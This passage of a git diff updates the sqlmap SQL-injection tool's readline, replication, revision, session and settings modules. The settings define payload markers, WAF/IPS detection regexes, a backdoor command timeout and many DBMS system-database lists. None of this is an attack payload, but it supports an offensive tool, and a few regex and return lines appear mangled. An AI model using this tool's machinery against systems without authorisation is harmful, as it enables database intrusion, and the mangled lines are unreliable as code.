developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from lib.core.data import logger -from lib.core.settings import IS_WIN -from lib.core.settings import PLATFORM - _readline = None - try: from readline import * import readline as _readline -except ImportError: +except: try: from pyreadline import * import pyreadline as _readline - except ImportError: + except: pass +from lib.core.data import logger +from lib.core.settings import IS_WIN +from lib.core.settings import PLATFORM + if IS_WIN and _readline: try: _outputfile = _readline.GetOutputFile() @@ -35,7 +34,7 @@ # Thanks to Boyd Waters for this patch. uses_libedit = False -if PLATFORM == 'mac' and _readline: +if PLATFORM == "mac" and _readline: import commands (status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__) @@ -56,9 +55,7 @@ # http://mail.python.org/pipermail/python-dev/2003-August/037845.html # has the original discussion. if _readline: - try: - _readline.clear_history() - except AttributeError: + if not hasattr(_readline, "clear_history"): def clear_history(): pass diff --git a/lib/core/replication.py b/lib/core/replication.py index 4ec9a0d76e4..2474e72b52e 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py @@ -1,16 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import sqlite3 -from extra.safe2bin.safe2bin import safechardecode +from lib.core.common import cleanReplaceUnicode +from lib.core.common import getSafeExString from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapValueException +from lib.core.settings import UNICODE_ENCODING +from lib.utils.safe2bin import safechardecode class Replication(object): """ @@ -19,12 +23,17 @@ class Replication(object): """ def __init__(self, dbpath): - self.dbpath = dbpath - self.connection = sqlite3.connect(dbpath) - self.connection.isolation_level = None - self.cursor = self.connection.cursor() - - class DataType: + try: + self.dbpath = dbpath + self.connection = sqlite3.connect(dbpath) + self.connection.isolation_level = None + self.cursor = self.connection.cursor() + except sqlite3.OperationalError as ex: + errMsg = "error occurred while opening a replication " + errMsg += "file '%s' ('%s')" % (dbpath, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) + + class DataType(object): """ Using this class we define auxiliary objects used for representing sqlite data types. @@ -39,7 +48,7 @@ def __str__(self): def __repr__(self): return "" % self - class Table: + class Table(object): """ This class defines methods used to manipulate table objects. """ @@ -49,11 +58,16 @@ def __init__(self, parent, name, columns=None, create=True, typeless=False): self.name = unsafeSQLIdentificatorNaming(name) self.columns = columns if create: - self.execute('DROP TABLE IF EXISTS "%s"' % self.name) - if not typeless: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) - else: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + try: + self.execute('DROP TABLE IF EXISTS "%s"' % self.name) + if not typeless: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) + else: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + except Exception as ex: + errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING) + errMsg += "located at '%s'" % self.parent.dbpath + raise SqlmapGenericException(errMsg) def insert(self, values): """ @@ -66,11 +80,14 @@ def insert(self, values): errMsg = "wrong number of columns used in replicating insert" raise SqlmapValueException(errMsg) - def execute(self, sql, parameters=[]): + def execute(self, sql, parameters=None): try: - self.parent.cursor.execute(sql, parameters) - except sqlite3.OperationalError, ex: - errMsg = "problem occurred ('%s') while accessing sqlite database " % ex + try: + self.parent.cursor.execute(sql, parameters or []) + except UnicodeError: + self.parent.cursor.execute(sql, cleanReplaceUnicode(parameters or [])) + except sqlite3.OperationalError as ex: + errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath errMsg += "it's not used by some other program" raise SqlmapGenericException(errMsg) @@ -89,10 +106,12 @@ def select(self, condition=None): """ This function is used for selecting row(s) from current table. """ - _ = 'SELECT * FROM %s' % self.name + query = 'SELECT * FROM "%s"' % self.name if condition: - _ += 'WHERE %s' % condition - return self.execute(_) + query += ' WHERE %s' % condition + + self.execute(query) + return self.parent.cursor.fetchall() def createTable(self, tblname, columns=None, typeless=False): """ diff --git a/lib/core/revision.py b/lib/core/revision.py index f86f9b5256f..e5e1a1e76f3 100644 --- a/lib/core/revision.py +++ b/lib/core/revision.py @@ -1,54 +1,62 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os import re +import subprocess -from subprocess import PIPE -from subprocess import Popen as execute +from lib.core.common import openFile +from lib.core.convert import getText def getRevisionNumber(): """ Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD" + + >>> len(getRevisionNumber() or (' ' * 7)) == 7 + True """ retVal = None filePath = None - _ = os.path.dirname(__file__) + directory = os.path.dirname(__file__) while True: - filePath = os.path.join(_, ".git", "HEAD") - if os.path.exists(filePath): + candidate = os.path.join(directory, ".git", "HEAD") + if os.path.exists(candidate): + filePath = candidate break - else: - filePath = None - if _ == os.path.dirname(_): - break - else: - _ = os.path.dirname(_) - while True: - if filePath and os.path.isfile(filePath): - with open(filePath, "r") as f: - content = f.read() - filePath = None - if content.startswith("ref: "): - filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip() - else: - match = re.match(r"(?i)[0-9a-f]{32}", content) - retVal = match.group(0) if match else None - break - else: + parent = os.path.dirname(directory) + if parent == directory: break + directory = parent + + if filePath: + with openFile(filePath, "r") as f: + content = getText(f.read()).strip() + + if content.startswith("ref: "): + ref_path = content.replace("ref: ", "").strip() + filePath = os.path.join(directory, ".git", ref_path) + + if os.path.exists(filePath): + with openFile(filePath, "r") as f_ref: + content = getText(f_ref.read()).strip() + + match = re.match(r"(?i)[0-9a-f]{40}", content) + retVal = match.group(0) if match else None if not retVal: - process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE) - stdout, _ = process.communicate() - match = re.search(r"(?i)[0-9a-f]{32}", stdout or "") - retVal = match.group(0) if match else None + try: + process = subprocess.Popen(["git", "rev-parse", "--verify", "HEAD"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + stdout, _ = process.communicate() + match = re.search(r"(?i)[0-9a-f]{40}", getText(stdout or "")) + retVal = match.group(0) if match else None + except: + pass return retVal[:7] if retVal else None diff --git a/lib/core/session.py b/lib/core/session.py index 630767c57cc..c26e4dc0951 100644 --- a/lib/core/session.py +++ b/lib/core/session.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -25,13 +25,15 @@ def setDbms(dbms): hashDBWrite(HASHDB_KEYS.DBMS, dbms) - _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search("^%s" % _, dbms, re.I) + _ = "(%s)" % ('|'.join(SUPPORTED_DBMS)) + _ = re.search(r"\A%s( |\Z)" % _, dbms, re.I) if _: dbms = _.group(1) Backend.setDbms(dbms) + if kb.resolutionDbms: + hashDBWrite(HASHDB_KEYS.DBMS, kb.resolutionDbms) logger.info("the back-end DBMS is %s" % Backend.getDbms()) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3edb4ecfd18..871d32e36c3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -1,61 +1,155 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import codecs import os +import platform +import random import re -import subprocess import string import sys +import time from lib.core.enums import DBMS from lib.core.enums import DBMS_DIRECTORY_NAME -from lib.core.revision import getRevisionNumber - -# sqlmap version and site -VERSION = "1.0-dev" -REVISION = getRevisionNumber() -VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "") +from lib.core.enums import OS +from thirdparty import six + +# sqlmap version (...) +VERSION = "1.10.1.85" +TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" +TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} +VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) DESCRIPTION = "automatic SQL injection and database takeover tool" -SITE = "http://sqlmap.org" +SITE = "https://sqlmap.org" +DEFAULT_USER_AGENT = "%s (%s)" % (VERSION_STRING, SITE) +DEV_EMAIL_ADDRESS = "dev@sqlmap.org" ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" -GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git" -ML = "sqlmap-users@lists.sourceforge.net" +GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git" +GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" +WIKI_PAGE = "https://github.com/sqlmapproject/sqlmap/wiki/" +ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master" + +# colorful banner +BANNER = """\033[01;33m\ + ___ + __H__ + ___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m +|_ -| . [.] | .'| . | +|___|_ [.]_|_|_|__,| _| + |_|V... |_| \033[0m\033[4;37m%s\033[0m\n +""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE) # Minimum distance of ratio from kb.matchRatio to result in True DIFF_TOLERANCE = 0.05 CONSTANT_RATIO = 0.9 +# Ratio used in heuristic check for WAF/IPS protected targets +IPS_WAF_CHECK_RATIO = 0.5 + +# Timeout used in heuristic check for WAF/IPS protected targets +IPS_WAF_CHECK_TIMEOUT = 10 + +# Timeout used in checking for existence of live-cookies file +LIVE_COOKIES_TIMEOUT = 120 + # Lower and upper values for match ratio in case of stable page LOWER_RATIO_BOUND = 0.02 UPPER_RATIO_BOUND = 0.98 +# For filling in case of dumb push updates +DUMMY_JUNK = "theim1Ga" + # Markers for special cases when parameter values contain html encoded characters -PARAMETER_AMP_MARKER = "__AMP__" -PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__" +PARAMETER_AMP_MARKER = "__PARAMETER_AMP__" +PARAMETER_SEMICOLON_MARKER = "__PARAMETER_SEMICOLON__" +BOUNDARY_BACKSLASH_MARKER = "__BOUNDARY_BACKSLASH__" +PARAMETER_PERCENTAGE_MARKER = "__PARAMETER_PERCENTAGE__" PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__" PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__" -URI_QUESTION_MARKER = "__QUESTION_MARK__" -ASTERISK_MARKER = "__ASTERISK_MARK__" - -PAYLOAD_DELIMITER = "\x00" +URI_QUESTION_MARKER = "__URI_QUESTION__" +ASTERISK_MARKER = "__ASTERISK__" +REPLACEMENT_MARKER = "__REPLACEMENT__" +BOUNDED_BASE64_MARKER = "__BOUNDED_BASE64__" +BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION__" +SAFE_VARIABLE_MARKER = "__SAFE_VARIABLE__" +SAFE_HEX_MARKER = "__SAFE_HEX__" +DOLLAR_MARKER = "__DOLLAR__" + +RANDOM_INTEGER_MARKER = "[RANDINT]" +RANDOM_STRING_MARKER = "[RANDSTR]" +SLEEP_TIME_MARKER = "[SLEEPTIME]" +INFERENCE_MARKER = "[INFERENCE]" +SINGLE_QUOTE_MARKER = "[SINGLE_QUOTE]" +GENERIC_SQL_COMMENT_MARKER = "[GENERIC_SQL_COMMENT]" + +PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__" CHAR_INFERENCE_MARK = "%c" -PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7e-\xff]" +PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]" + +# Regular expression used for extraction of table names (useful for (e.g.) MsAccess) +SELECT_FROM_TABLE_REGEX = r"\bSELECT\b.+?\bFROM\s+(?P([\w.]|`[^`<>]+`)+)" + +# Regular expression used for recognition of textual content-type +TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)" # Regular expression used for recognition of generic permission messages -PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied" +PERMISSION_DENIED_REGEX = r"\b(?P(command|permission|access|user)\s*(was|is|has been)?\s*(denied|forbidden|unauthorized|rejected|not allowed))" + +# Regular expression used in recognition of generic protection mechanisms +GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b" + +# Regular expression used to detect errors in fuzz(y) UNION test +FUZZ_UNION_ERROR_REGEX = r"(?i)data\s?type|mismatch|comparable|compatible|conversion|convert|failed|error|unexpected" + +# Upper threshold for starting the fuzz(y) UNION test +FUZZ_UNION_MAX_COLUMNS = 10 # Regular expression used for recognition of generic maximum connection messages -MAX_CONNECTIONS_REGEX = r"max.+connections" +MAX_CONNECTIONS_REGEX = r"\bmax.{1,100}\bconnection" + +# Maximum consecutive connection errors before asking the user if he wants to continue +MAX_CONSECUTIVE_CONNECTION_ERRORS = 15 + +# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it) +PRECONNECT_CANDIDATE_TIMEOUT = 10 + +# Servers known to cause issue with pre-connection mechanism (because of lack of multi-threaded support) +PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP", "BaseHTTP") + +# Identify WAF/IPS inside limited number of responses (Note: for optimization purposes) +IDENTYWAF_PARSE_LIMIT = 10 -# Regular expression used for extracting results from google search -GOOGLE_REGEX = r"url\?\w+=(http[^>]+)&(sa=U|rct=j)" +# Maximum sleep time in "Murphy" (testing) mode +MAX_MURPHY_SLEEP_TIME = 3 + +# Regular expression used for extracting results from Google search +GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" + +# Google Search consent cookie +GOOGLE_CONSENT_COOKIE = "CONSENT=YES+shp.gws-%s-0-RC1.%s+FX+740" % (time.strftime("%Y%m%d"), "".join(random.sample(string.ascii_lowercase, 2))) + +# Regular expression used for extracting results from DuckDuckGo search +DUCKDUCKGO_REGEX = r'= 7) TIME_STDEV_COEFF = 7 +# Minimum response time that can be even considered as delayed (not a complete requirement) +MIN_VALID_DELAYED_RESPONSE = 0.5 + # Standard deviation after which a warning message should be displayed about connection lags WARN_TIME_STDEV = 0.5 @@ -77,28 +174,43 @@ TIME_DELAY_CANDIDATES = 3 # Default value for HTTP Accept header -HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" +HTTP_ACCEPT_HEADER_VALUE = "*/*" # Default value for HTTP Accept-Encoding header HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" -# HTTP timeout in silent mode -HTTP_SILENT_TIMEOUT = 3 +# Default timeout for running commands over backdoor +BACKDOOR_RUN_CMD_TIMEOUT = 5 + +# Number of seconds to wait for thread finalization at program end +THREAD_FINALIZATION_TIMEOUT = 1 # Maximum number of techniques used in inject.py/getValue() per one value MAX_TECHNIQUES_PER_VALUE = 2 +# In case of missing piece of partial union dump, buffered array must be flushed after certain size +MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024 + +# Maximum size of cache used in @cachedmethod decorator +MAX_CACHE_ITEMS = 1024 + # Suffix used for naming meta databases in DBMS(es) without explicit database name METADB_SUFFIX = "_masterdb" +# Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt) +PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3 + # Minimum time response set needed for time-comparison based on standard deviation -MIN_TIME_RESPONSES = 15 +MIN_TIME_RESPONSES = 30 + +# Maximum time response set used during time-comparison based on standard deviation +MAX_TIME_RESPONSES = 200 # Minimum comparison ratio set needed for searching valid union column number based on standard deviation MIN_UNION_RESPONSES = 5 # After these number of blanks at the end inference should stop (just in case) -INFERENCE_BLANK_BREAK = 10 +INFERENCE_BLANK_BREAK = 5 # Use this replacement character for cases when inference is not able to retrieve the proper character value INFERENCE_UNKNOWN_CHAR = '?' @@ -106,20 +218,23 @@ # Character used for operation "greater" in inference INFERENCE_GREATER_CHAR = ">" +# Character used for operation "greater or equal" in inference +INFERENCE_GREATER_EQUALS_CHAR = ">=" + # Character used for operation "equals" in inference INFERENCE_EQUALS_CHAR = "=" # Character used for operation "not-equals" in inference INFERENCE_NOT_EQUALS_CHAR = "!=" -# String used for representation of unknown dbms +# String used for representation of unknown DBMS UNKNOWN_DBMS = "Unknown" -# String used for representation of unknown dbms version +# String used for representation of unknown DBMS version UNKNOWN_DBMS_VERSION = "Unknown" -# Dynamicity mark length used in dynamicity removal engine -DYNAMICITY_MARK_LENGTH = 32 +# Dynamicity boundary length used in dynamicity removal engine +DYNAMICITY_BOUNDARY_LENGTH = 20 # Dummy user prefix used in dictionary attack DUMMY_USER_PREFIX = "__dummy__" @@ -127,86 +242,157 @@ # Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1 DEFAULT_PAGE_ENCODING = "iso-8859-1" -# System variables -IS_WIN = subprocess.mswindows +try: + codecs.lookup(DEFAULT_PAGE_ENCODING) +except LookupError: + DEFAULT_PAGE_ENCODING = "utf8" + +# Marker for program piped input +STDIN_PIPE_DASH = '-' + +# URL used in dummy runs +DUMMY_URL = "http://foo/bar?id=1" + +# Timeout used during initial websocket (pull) testing +WEBSOCKET_INITIAL_TIMEOUT = 3 # The name of the operating system dependent module imported. The following names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', 'java', 'riscos' PLATFORM = os.name PYVERSION = sys.version.split()[0] +IS_WIN = PLATFORM == "nt" +IS_PYPY = platform.python_implementation() == "PyPy" -# Database management system specific variables -MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") -MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql" -PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast") -ORACLE_SYSTEM_DBS = ("CTXSYS", "DBSNMP", "DMSYS", "EXFSYS", "MDSYS", "OLAPSYS", "ORDSYS", "OUTLN", "SYS", "SYSAUX", "SYSMAN", "SYSTEM", "TSMSYS", "WMSYS", "XDB") # These are TABLESPACE_NAME +# Check if running in terminal +IS_TTY = hasattr(sys.stdout, "fileno") and os.isatty(sys.stdout.fileno()) + +# DBMS system databases +MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb", "Resource", "ReportServer", "ReportServerTempDB", "distribution", "mssqlsystemresource") +MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema", "sys", "ndbinfo") +PGSQL_SYSTEM_DBS = ("postgres", "template0", "template1", "information_schema", "pg_catalog", "pg_toast", "pgagent") +ORACLE_SYSTEM_DBS = ("ADAMS", "ANONYMOUS", "APEX_030200", "APEX_PUBLIC_USER", "APPQOSSYS", "AURORA$ORB$UNAUTHENTICATED", "AWR_STAGE", "BI", "BLAKE", "CLARK", "CSMIG", "CTXSYS", "DBSNMP", "DEMO", "DIP", "DMSYS", "DSSYS", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "HR", "IX", "JONES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OC", "OE", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "PAPER", "PERFSTAT", "PM", "SCOTT", "SH", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "TRACESVR", "TSMSYS", "WK_TEST", "WKPROXY", "WKSYS", "WMSYS", "XDB", "XS$NULL") SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") -ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\ - "MSysAccessXML", "MSysModules", "MSysModules2") -FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\ - "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\ - "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\ - "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\ - "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\ - "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") +ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2", "MSysNavPaneGroupCategories", "MSysNavPaneGroups", "MSysNavPaneGroupToObjects", "MSysNavPaneObjectIDs") +FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN") -SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs") -DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\ - "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") - +SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs", "tempdb") +DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS", "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS", "SYSDEBUG", "SYSINST") +HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") +H2_SYSTEM_DBS = ("INFORMATION_SCHEMA",) + ("IGNITE", "ignite-sys-cache") +INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin") +MONETDB_SYSTEM_DBS = ("tmp", "json", "profiler") +DERBY_SYSTEM_DBS = ("NULLID", "SQLJ", "SYS", "SYSCAT", "SYSCS_DIAG", "SYSCS_UTIL", "SYSFUN", "SYSIBM", "SYSPROC", "SYSSTAT") +VERTICA_SYSTEM_DBS = ("v_catalog", "v_internal", "v_monitor",) +MCKOI_SYSTEM_DBS = ("",) +PRESTO_SYSTEM_DBS = ("information_schema",) +ALTIBASE_SYSTEM_DBS = ("SYSTEM_",) +MIMERSQL_SYSTEM_DBS = ("information_schema", "SYSTEM",) +CRATEDB_SYSTEM_DBS = ("information_schema", "pg_catalog", "sys") +CLICKHOUSE_SYSTEM_DBS = ("information_schema", "INFORMATION_SCHEMA", "system") +CUBRID_SYSTEM_DBS = ("DBA",) +CACHE_SYSTEM_DBS = ("%Dictionary", "INFORMATION_SCHEMA", "%SYS") +EXTREMEDB_SYSTEM_DBS = ("",) +FRONTBASE_SYSTEM_DBS = ("DEFINITION_SCHEMA", "INFORMATION_SCHEMA") +RAIMA_SYSTEM_DBS = ("",) +VIRTUOSO_SYSTEM_DBS = ("",) +SNOWFLAKE_SYSTEM_DBS = ("INFORMATION_SCHEMA",) + +# Note: () + () MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") -MYSQL_ALIASES = ("mysql", "my") -PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") -ORACLE_ALIASES = ("oracle", "orcl", "ora", "or") +MYSQL_ALIASES = ("mysql", "my") + ("mariadb", "maria", "memsql", "tidb", "percona", "drizzle", "doris", "starrocks") +PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb", "opengauss") +ORACLE_ALIASES = ("oracle", "orcl", "ora", "or", "dm8") SQLITE_ALIASES = ("sqlite", "sqlite3") -ACCESS_ALIASES = ("msaccess", "access", "jet", "microsoft access") +ACCESS_ALIASES = ("microsoft access", "msaccess", "access", "jet") FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb") -MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db") +MAXDB_ALIASES = ("max", "maxdb", "sap maxdb", "sap db") SYBASE_ALIASES = ("sybase", "sybase sql server") DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") +HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") +H2_ALIASES = ("h2",) + ("ignite", "apache ignite") +INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix") +MONETDB_ALIASES = ("monet", "monetdb",) +DERBY_ALIASES = ("derby", "apache derby",) +VERTICA_ALIASES = ("vertica",) +MCKOI_ALIASES = ("mckoi",) +PRESTO_ALIASES = ("presto",) +ALTIBASE_ALIASES = ("altibase",) +MIMERSQL_ALIASES = ("mimersql", "mimer") +CRATEDB_ALIASES = ("cratedb", "crate") +CUBRID_ALIASES = ("cubrid",) +CLICKHOUSE_ALIASES = ("clickhouse",) +CACHE_ALIASES = ("intersystems cache", "cachedb", "cache", "iris") +EXTREMEDB_ALIASES = ("extremedb", "extreme") +FRONTBASE_ALIASES = ("frontbase",) +RAIMA_ALIASES = ("raima database manager", "raima", "raimadb", "raimadm", "rdm", "rds", "velocis") +VIRTUOSO_ALIASES = ("virtuoso", "openlink virtuoso") +SNOWFLAKE_ALIASES = ("snowflake",) DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) -SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES +SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES + SNOWFLAKE_ALIASES) SUPPORTED_OS = ("linux", "windows") +DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), 